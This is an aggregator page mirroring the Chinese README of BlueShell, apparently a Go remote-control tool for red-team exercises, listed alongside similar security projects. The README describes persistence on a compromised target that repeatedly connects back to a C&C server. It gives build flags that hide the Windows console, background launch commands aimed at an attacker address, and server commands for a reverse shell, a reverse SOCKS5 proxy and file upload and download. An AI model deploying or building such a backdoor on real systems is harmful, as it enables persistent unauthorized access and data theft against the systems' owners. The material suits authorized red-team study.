GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → whitehatnote → Blueshell

whitehatnote / Blueshell

红蓝对抗跨平台远控工具

Programming Languages

go
31211 projects - #10 most used programming language
shell
77523 projects

Labels

pentestsocksblueteam

Projects that are alternatives of or similar to Blueshell

Defaultcreds Cheat Sheet
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
Stars: ✭ 1,949 (+414.25%)
Mutual labels:  pentest, blueteam
1earn
个人维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Stars: ✭ 776 (+104.75%)
Mutual labels:  pentest, blueteam
NIST-to-Tech
An open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)
Stars: ✭ 61 (-83.91%)
Mutual labels:  pentest, blueteam
Snoop
Snoop — инструмент разведки на основе открытых данных (OSINT world)
Stars: ✭ 886 (+133.77%)
Mutual labels:  pentest, blueteam
Oblivion
Data leak checker & OSINT Tool
Stars: ✭ 237 (-37.47%)
Mutual labels:  pentest, blueteam
sx
🖖 Fast, modern, easy-to-use network scanner
Stars: ✭ 1,267 (+234.3%)
Mutual labels:  socks, pentest
1earn
ffffffff0x 团队维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Stars: ✭ 3,715 (+880.21%)
Mutual labels:  pentest, blueteam
Awesome Infosec
A curated list of awesome infosec courses and training resources.
Stars: ✭ 3,779 (+897.1%)
Mutual labels:  pentest
Dnsbrute
a fast domain brute tool
Stars: ✭ 352 (-7.12%)
Mutual labels:  pentest
Offensive Docker
Offensive Docker is an image with the more used offensive tools to create an environment easily and quickly to launch assessment to the targets.
Stars: ✭ 328 (-13.46%)
Mutual labels:  pentest
Kaboom
A tool to automate penetration tests
Stars: ✭ 322 (-15.04%)
Mutual labels:  pentest
Black Hat Rust
Applied offensive security with Rust - Early access - https://academy.kerkour.com/black-hat-rust?coupon=GITHUB
Stars: ✭ 331 (-12.66%)
Mutual labels:  pentest
Pentest Lab
Pentest Lab on OpenStack with Heat, Chef provisioning and Docker
Stars: ✭ 353 (-6.86%)
Mutual labels:  pentest
Bxss
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
Stars: ✭ 331 (-12.66%)
Mutual labels:  blueteam
Webshell Sniper
🔨 Manage your website via terminal
Stars: ✭ 359 (-5.28%)
Mutual labels:  pentest
Socks5
SOCKS Protocol Version 5 Library in Go. Full TCP/UDP and IPv4/IPv6 support
Stars: ✭ 321 (-15.3%)
Mutual labels:  socks
K8tools
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
Stars: ✭ 4,173 (+1001.06%)
Mutual labels:  pentest
Pidense
🍓📡🍍Monitor illegal wireless network activities. (Fake Access Points), (WiFi Threats: KARMA Attacks, WiFi Pineapple, Similar SSID, OPN Network Density etc.)
Stars: ✭ 358 (-5.54%)
Mutual labels:  blueteam
Cve 2019 0708
3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
Stars: ✭ 350 (-7.65%)
Mutual labels:  pentest
Enum4linux Ng
A next generation version of enum4linux (a Windows/Samba enumeration tool) with additional features like JSON/YAML export. Aimed for security professionals and CTF players.
Stars: ✭ 349 (-7.92%)
Mutual labels:  pentest
View All Similar Projects ➔

BlueShell

BlueShell是一个Go语言编写的持续远控工具,拿下靶机后,根据操作系统版本下载部署对应的bsClient,其会每隔固定时间向指定的C&C地址发起反弹连接尝试,在C&C端运行bsServer即可连接bsClient,从而实现对靶机的持续控制,主要适用场景:

  • 红蓝对抗中的持久化后门或内网代理
  • 社工钓鱼二次加载Payload

目前支持的主要功能有:

  • 循环持续控制
  • 跨平台,支持Linux、Windows、MacOS
  • 交互式Shell反弹,Linux支持Tab补全、VIM、Ctrl+C等交互式操作,Windows只支持普通反弹Shell
  • Socks5代理反弹
  • 文件上传、下载
  • TLS通信加密

项目地址:https://github.com/whitehatnote/BlueShell

编译可执行文件

Linux and MacOS

生成bsClient

go get github.com/armon/go-socks5
go get github.com/creack/pty
go get github.com/hashicorp/yamux

go build --ldflags "-s -w " -o bsClient client.go

生成bsServer

go get github.com/creack/pty
go get github.com/hashicorp/yamux
go get github.com/djimenez/iconv-go
go get golang.org/x/crypto/ssh/terminal

go build --ldflags "-s -w " -o bsServer server.go

Windows

生成bsClient

go get github.com/armon/go-socks5
go get github.com/creack/pty
go get github.com/hashicorp/yamux

go build --ldflags "-s -w -H=windowsgui" -o bsClient.exe client.go

工具使用方法

Client

在受控靶机上运行bsClient

Windows靶机:

默认配置模式启动

start /b bsClient.exe

参数模式启动,-h指定远控端地址,-p指定远控端监听端口,-t指定尝试连接远控的间隔秒数

start /b bsClient.exe -h 10.0.0.1 -p 443 -t 10

Linux and MacOS靶机:

默认配置模式启动

nohup bsClient &

参数模式启动,-h指定远控端地址,-p指定远控端监听端口

nohup bsClient -h 10.0.0.1 -p 443 &

C&C Server

远控端运行bsServer,需要是Linux机器,并且key目录与bsServer在相同根目录下,启动成功如下效果:

[[email protected] BluesShell]# ls -al
总用量 4148
drwxr-xr-x   3 root root    4096 6月  17 22:14 .
drwxrwxrwt. 10 root root   40960 6月  17 22:13 ..
-rwxr-xr-x   1 root root 4193320 6月  17 22:13 bsServer
drwxr-xr-x   2 root root    4096 6月  17 22:13 key
[[email protected] BluesShell]# ./bsServer
waiting for client connect...

Action:反弹shell

默认启动,远控监听8081端口,执行反弹shell操作

./bsServer

参数启动,-p指定远控监听443端口,-a指定执行反弹shell操作

./bsServer -p 443 -a shell

windows靶机的乱码问题解决,-rencode指定靶机的编码类型

./bsServer -rencode gb2312

Action:反弹Socks5代理

默认启动,远控监听8081端口,执行反弹socks操作,socks5的默认监听端口为7777,默认用户名blue,默认密码[email protected]

./bsServer -a socks

参数启动,-p指定远控监听443端口,-a指定执行反弹socks操作,-sport指定socks监听的端口为7778,-suser指定socks代理的认证账号,-spass指定socks代理的认证密码

./bsServer -p 443 -a socks -sport 7778 -suser socksUser -spass socksPassword

Action:文件上传下载

上传本地文件到受控靶机,-lpath指定需要上传的本地文件路径,-rdir指定上传到的目录

./bsServer -a upload -lpath /tmp/tmp.txt -rdir c:\\

从受控靶机下载文件到本地,-rpath指定需要下载的文件地址,-ldir指定存放下载文件的本地路径

./bsServer -a download -rpath c:\\tmp.txt -ldir /tmp

0x4. 参考

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].